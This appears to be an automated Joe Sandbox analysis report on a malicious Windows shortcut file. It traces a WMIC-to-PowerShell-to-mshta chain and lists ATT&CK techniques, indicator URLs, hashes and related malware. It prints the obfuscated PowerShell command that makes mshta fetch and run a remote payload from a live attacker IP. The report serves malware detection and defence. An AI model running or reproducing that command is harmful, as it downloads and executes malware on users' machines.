Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdbyh source: powershell.exe, 00000006.00000002.1465320420.00000221F52DA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000006.00000002.1464128230.00000221F50AC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1464128230.00000221F507B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1464128230.00000221F4FC0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000006.00000002.1465320420.00000221F52DA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbH source: powershell.exe, 00000006.00000002.1465320420.00000221F52DA000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FF887A160AB push cs; ret 6_2_00007FF887A160B4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FF887A1CBAB push esi; ret 6_2_00007FF887A1CBCA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FF887A1CB6D push ebp; ret 6_2_00007FF887A1CBAA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FF887A1FB5D push esp; retf 6_2_00007FF887A1FB5E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FF887A23200 push ebp; retf 6_2_00007FF887A34F7A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FF887A18167 push ebx; ret 6_2_00007FF887A1816A

Persistence and Installation Behavior

Source: LNK file | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file | Process created: C:\Windows\System32\mshta.exe
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FF887AE0F6D sldt word ptr [eax]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5991
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3832
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4666
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 735
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648 | Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744 | Thread sleep count: 4666 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7732 | Thread sleep count: 735 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828 | Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7692 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6968 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: mshta.exe, 00000005.00000002.2637014653.0000023A49318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2637014653.0000023A49363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2638426780.000001B0EB42B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2639900329.000001B0F0A56000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: mshta.exe, 00000005.00000002.2637014653.0000023A492C8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWpx3I:
Source: C:\Windows\System32\wbem\WMIC.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://80.76.51.231/Samarik
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
MITRE ATT&CK Matrix, techniques listed per tactic (numeric prefixes as shown in the report):
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 21 Windows Management Instrumentation; 1 PowerShell; At; Cron; Launchd; Scheduled Task
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 11 Masquerading; 41 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Obfuscated Files or Information; 1 DLL Side-Loading; Steganography
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 11 Security Software Discovery; 11 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 23 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 1 Email Collection; 1 Archive Collected Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 12 Encrypted Channel; 1 Application Layer Protocol; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior Graph (rendered graph not preserved; node and edge data follows). Behavior Graph ID: 1569818; Sample: 6G4au3vWsI.lnk; Startdate: 06/12/2024; Architecture: WINDOWS; Score: 96
Start node signatures: Antivirus detection for URL or domain; Windows shortcut file (LNK) starts blacklisted processes; Multi AV Scanner detection for submitted file; 5 other signatures
Start -> WMIC.exe (started); signatures: Suspicious powershell command line found; Contains functionality to create processes via WMI; Creates processes via WMI
WMIC.exe -> powershell.exe (started); signatures: Windows shortcut file (LNK) starts blacklisted processes
WMIC.exe -> conhost.exe (started)
powershell.exe -> mshta.exe (started); mshta.exe -> 80.76.51.231, 443, 49707, 49710 CLOUDCOMPUTINGDE Bulgaria
powershell.exe -> powershell.exe (started)
powershell.exe -> conhost.exe (started)
Start -> svchost.exe (started); svchost.exe -> 127.0.0.1 unknown unknown

Source | Detection | Scanner | Label
6G4au3vWsI.lnk | 26% | ReversingLabs | Win32.Trojan.Lummastealer
6G4au3vWsI.lnk | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
https://80.76.51.231/Samarik= | 0% | Avira URL Cloud | safe
https://80.76.51.231/SamarikE | 0% | Avira URL Cloud | safe
https://80.76.51.231/SamarikH | 0% | Avira URL Cloud | safe
https://80.76.51.231/SamarikC: | 0% | Avira URL Cloud | safe
https://80.76.51.231/SamarikCH& | 0% | Avira URL Cloud | safe
http://www.microsoft. | 0% | Avira URL Cloud | safe
https://80.76.51.231/SamarikZHO | 0% | Avira URL Cloud | safe
https://80.76.51.231/SamarikZY~ | 0% | Avira URL Cloud | safe
https://80.76.51.231/SamarikCE0B | 0% | Avira URL Cloud | safe
https://80.76.51.231/Samarik/ | 100% | Avira URL Cloud | malware
https://80.76.51.231/Samarik | 100% | Avira URL Cloud | malware
https://80.76.51.231/Samarikr | 0% | Avira URL Cloud | safe
https://80.76.51.231/Samarikuo | 0% | Avira URL Cloud | safe
https://80.76.51.231/Samarik... | 100% | Avira URL Cloud | malware
https://80.76.51.231/Samarik-1-0/ | 0% | Avira URL Cloud | safe
https://oneget.orgX | 0% | Avira URL Cloud | safe
https://oneget.org | 0% | Avira URL Cloud | safe
https://80.76.51.231/ | 0% | Avira URL Cloud | safe
https://80.76.51.231/Samarik1-1-0# | 0% | Avira URL Cloud | safe
No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000006.00000002.1444531399.00000221802D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1459332555.00000221901C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1444531399.0000022181B8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1459332555.000002219008D000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000006.00000002.1444531399.000002218192C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://80.76.51.231/Samarik= | mshta.exe, 00000005.00000002.2637715324.0000023A494D0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000006.00000002.1444531399.0000022181B30000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000006.00000002.1444531399.0000022181B30000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://80.76.51.231/SamarikH | mshta.exe, 00000005.00000002.2636956149.0000023A49270000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://80.76.51.231/SamarikE | mshta.exe, 00000005.00000002.2637014653.0000023A49318000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://go.micro | powershell.exe, 00000006.00000002.1444531399.0000022180F2C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000006.00000002.1459332555.000002219008D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000006.00000002.1459332555.000002219008D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://80.76.51.231/Samarik/ | mshta.exe, 00000005.00000002.2637014653.0000023A49318000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://crl.ver) | svchost.exe, 0000000B.00000002.2639952714.000001B0F0A85000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.microsoft. | powershell.exe, 00000006.00000002.1464128230.00000221F507B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://80.76.51.231/SamarikZY~ | mshta.exe, 00000005.00000002.2637014653.0000023A492A0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://80.76.51.231/SamarikC: | mshta.exe, 00000005.00000002.2637014653.0000023A492A0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://80.76.51.231/SamarikCH& | mshta.exe, 00000005.00000002.2637014653.0000023A492C8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://80.76.51.231/SamarikZHO | mshta.exe, 00000005.00000002.2637014653.0000023A492C8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://80.76.51.231/SamarikCE0B | mshta.exe, 00000005.00000002.2637014653.0000023A492B9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://80.76.51.231/Samarikuo | mshta.exe, 00000005.00000002.2637014653.0000023A492B9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000006.00000002.1444531399.0000022181B30000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://80.76.51.231/Samarik | mshta.exe, 00000005.00000002.2637014653.0000023A492B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2637014653.0000023A492A0000.00000004.00000020.00020000.00000000.sdmp, 6G4au3vWsI.lnk | true | Avira URL Cloud: malware | unknown
https://80.76.51.231/Samarikr | mshta.exe, 00000005.00000002.2637014653.0000023A492C8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://80.76.51.231/Samarik... | mshta.exe, 00000005.00000002.2637014653.0000023A4936E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2637014653.0000023A49359000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://g.live.com/odclientsettings/Prod-C: | qmgr.db.11.dr | false | | high
https://80.76.51.231/ | mshta.exe, 00000005.00000002.2637014653.0000023A49352000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000006.00000002.1459332555.000002219008D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/ProdV2-C: | svchost.exe, 0000000B.00000003.2316039782.000001B0F0C00000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000006.00000002.1444531399.00000221802D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1459332555.00000221901C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1444531399.0000022181B8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1459332555.000002219008D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://oneget.orgX | powershell.exe, 00000006.00000002.1444531399.000002218192C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000006.00000002.1444531399.0000022180001000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000006.00000002.1444531399.0000022180001000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://80.76.51.231/Samarik-1-0/ | mshta.exe, 00000005.00000002.2637014653.0000023A492B9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://oneget.org | powershell.exe, 00000006.00000002.1444531399.000002218192C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://80.76.51.231/Samarik1-1-0# | mshta.exe, 00000005.00000002.2637014653.0000023A492B9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
80.76.51.231 | unknown | Bulgaria | 43659 | CLOUDCOMPUTINGDE | true
IP
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1569818
Start date and time: 2024-12-06 10:26:03 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 49s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 6G4au3vWsI.lnk
renamed because original name is a hash value
Original Sample Name: 2b4f800413a890176ebfec3ccc57fcbb.lnk
Detection: MAL
Classification: mal96.evad.winLNK@9/11@0/2
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 55%
                                • Number of executed functions: 8
                                • Number of non-executed functions: 5
                                Cookbook Comments:
                                • Found application associated with file extension: .lnk
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                • Excluded IPs from analysis (whitelisted): 23.218.208.109
                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; report is missing behavior information
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: 6G4au3vWsI.lnk
Time      Type             Description
04:27:00  API Interceptor  1x Sleep call for process: WMIC.exe modified
04:27:02  API Interceptor  49x Sleep call for process: powershell.exe modified
04:28:32  API Interceptor  2x Sleep call for process: svchost.exe modified
Match         Associated Sample Name / URL   Detection   Threat Name   Context
80.76.51.231  EqQiuXOCoG.exe                 malicious   AsyncRAT
                                  No context
Match             Associated Sample Name / URL   Detection   Threat Name            Context
CLOUDCOMPUTINGDE  tegga.hta                      malicious   Xmrig                  185.216.68.189
                  KzHndnydSG.dll                 malicious   CobaltStrike           185.216.71.202
                  bot.sh4.elf                    malicious   Mirai, Gafgyt, Okiru   80.76.51.45
                  bot.arm.elf                    malicious   Mirai, Gafgyt, Okiru   80.76.51.45
                  bot.arm7.elf                   malicious   Mirai, Okiru           80.76.51.45
                  bot.x86_64.elf                 malicious   Mirai, Gafgyt, Okiru   80.76.51.45
                  bot.arm5.elf                   malicious   Mirai, Gafgyt, Okiru   80.76.51.45
                  bot.m68k.elf                   malicious   Mirai, Gafgyt, Okiru   80.76.51.45
                  bot.mpsl.elf                   malicious   Mirai, Gafgyt, Okiru   80.76.51.45
                  bot.mips.elf                   malicious   Mirai, Gafgyt, Okiru   80.76.51.45
                                  No context
                                  No context
                                  Process:C:\Windows\System32\svchost.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):1310720
                                  Entropy (8bit):0.4932214950514226
                                  Encrypted:false
                                  SSDEEP:1536:cJNnm0h6QV70hV40h5RJkS6SNJNJbSMeCXhtvKTeYYJyNtEBRDna33JnbgY1ZtaV:cJhXC9lHmutpJyiRDeJ/aUKrDgnmT
                                  MD5:E696B1872C49D723A1F797AAD8AEB750
                                  SHA1:1127F5EEBA792936ED9D25E94BC4A53B3F89F6B2
                                  SHA-256:00B48193914454E28058B262B02B37019D0CD2D487EB715754720B4B641A2FAA
                                  SHA-512:DE068D19EBBEAAD96404898A20C4126F65FAC644CFE8A078DF5E640D58E8718C33E5FF82D9FC2849EE7298DF7E5F692BA95926E073F9BEF89C29FC41C918A587
                                  Malicious:false
                                  Reputation:low
                                  Preview:^.;V........@..@-....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................&.#.\.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                  Process:C:\Windows\System32\svchost.exe
                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb43266a4, page size 16384, DirtyShutdown, Windows version 10.0
                                  Category:dropped
                                  Size (bytes):1310720
                                  Entropy (8bit):0.721715237233982
                                  Encrypted:false
                                  SSDEEP:1536:rSB2ESB2SSjlK/Tv5m0hnRJjAVtu8Ykr3g16tV2UPkLk+kcBLZiAcZwytuknSDVd:razaNvFv8V2UW/DLzN/w4wZi
                                  MD5:7117E20309C73E29B7A0E7C8150E3166
                                  SHA1:4107539EDF73ED17D8182E79265F840A5A20D7B1
                                  SHA-256:F044B8DB0B3A6BC59BBFF15B62AAC0AB99138C981115CA3171F9B348F79044FC
                                  SHA-512:125F00F7F1ECE1604DC2069F35C6F00207FCBCE21A353B6B1F688F15DCC6E54E7837626CFABC8CC595BBB0ED531FD900D8FE362A0DAEFE0488FC5D72233E5FD6
                                  Malicious:false
                                  Reputation:low
                                  Preview:.2f.... ...............X\...;...{......................p.D..........{}. ....|..h.F.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......-....{...............................................................................................................................................................................................2...{..................................*..% ....|..................;x.g ....|...........................#......h.F.....................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\System32\svchost.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):16384
                                  Entropy (8bit):0.08098713937702061
                                  Encrypted:false
                                  SSDEEP:3:V/8Yeyw3CoT/fgsCrZClW/tjCwV8Bl/oll+SHY/Xl+/rQLve:VUzjCoLfgs3GpCu8TAAS4M
                                  MD5:EAFA2104F27F467E0E6FBC0CD572FCE4
                                  SHA1:D0D2402D623D2D2B49B139DB84F4736A8FD0BC76
